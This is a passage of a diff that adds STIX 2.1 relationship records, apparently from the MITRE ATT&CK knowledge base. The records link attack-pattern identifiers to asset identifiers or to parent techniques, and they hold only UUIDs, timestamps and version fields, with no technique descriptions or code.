"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6bb7d9a9-e17e-4c20-bc99-5746122c13e0", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6bbf086a-eb72-4c63-9156-299fdc2530ea", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6bc48e5c-e78c-4f0e-9321-5ac8393aea3a", + "created": "2024-06-26T13:52:08.808Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:52:08.808Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6bc7b4ef-a990-4f99-803a-9cb8c1713f83", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6bea2932-cad8-4404-b902-d52eb3126c78", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6bead52e-8873-4888-9a5b-d24640ea84d8", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c31c795-935a-41ad-8db1-d74430f4a553", + "created": "2023-09-29T18:56:59.151Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T02:21:01.295Z", + "description": "Asset Mapping Rationale: ", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c39a683-09df-40fa-adcc-d95e33f5e11a", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c3d4be8-2c2c-4e31-bd27-23090ec46466", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c470aa0-b119-4078-80fc-2b66a4d6eac4", + "created": "2023-09-28T20:09:36.756Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:09:36.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c6b245e-7da9-4bb2-aa48-36ce1cdb1757", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c859bdc-6906-4c32-bfa3-b1a562fcc757", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c8a892e-ecde-4402-89f1-8ae287592912", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c917468-e8f1-48d1-b7e5-aab34c5ff497", + "created": "2020-10-05T13:24:49.882Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c99a74d-8a17-453b-9100-ebb3cca33faa", + "created": "2020-03-13T14:10:43.600Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6c9c1c11-c996-4d2b-bbed-d73ae30efd2e", + "created": "2023-09-28T20:08:52.975Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:08:52.975Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6cd07a3b-18d3-40ec-ab3d-cd4ae952609c", + "created": "2020-01-24T18:26:19.234Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300", + "target_ref": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6cd07e42-1718-402d-99d4-4f2357f7d17a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6cd2bccc-af06-4fcc-9e36-724203f862cc", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6cd835e9-2b80-4e94-8e47-6c1e3eace23b", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6ce9b9dd-7474-48d8-b4bd-6d9585080201", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6cef7e65-bdb6-4734-87f6-be1359705d14", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6cfec1c3-7153-4cc2-a32c-eca8ddbfc35c", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d07dfc3-1a04-4461-b282-8aab029d2dac", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d137f11-8f05-45e8-960c-d64bc14167be", + "created": "2020-03-10T18:33:36.474Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "target_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d229ace-bbac-4e39-9238-76391524816d", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d23fc4c-cde5-48d0-999a-4ab17de4f47b", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d2d9a76-966a-47f7-8f35-a21c2a2bbd75", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d3a6f6f-139e-4ab7-8315-38685fccf942", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d3d5a4b-ba7c-4355-952c-3e9927460473", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d5b3a47-0e2c-4a2f-8666-f95303b61faf", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d7ce16b-d664-4b5f-aae7-c049cd20041a", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d8b1f40-48a0-484b-8eea-48195a8bfff2", + "created": "2020-02-21T20:32:21.128Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6d9137a0-51ab-4503-a0e9-f6c23c52eb55", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6db133fd-2beb-4c5e-a97c-3d3ef03bee50", + "created": "2020-02-11T18:58:46.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6dbd9e52-9ca1-49b9-9803-28fbef766fe6", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6dd3b48d-30f5-4b3d-8d45-7659fab8ada3", + "created": "2024-06-26T14:51:59.881Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:51:59.881Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6e0076a8-b44b-4905-96b8-6c9283c0763d", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": 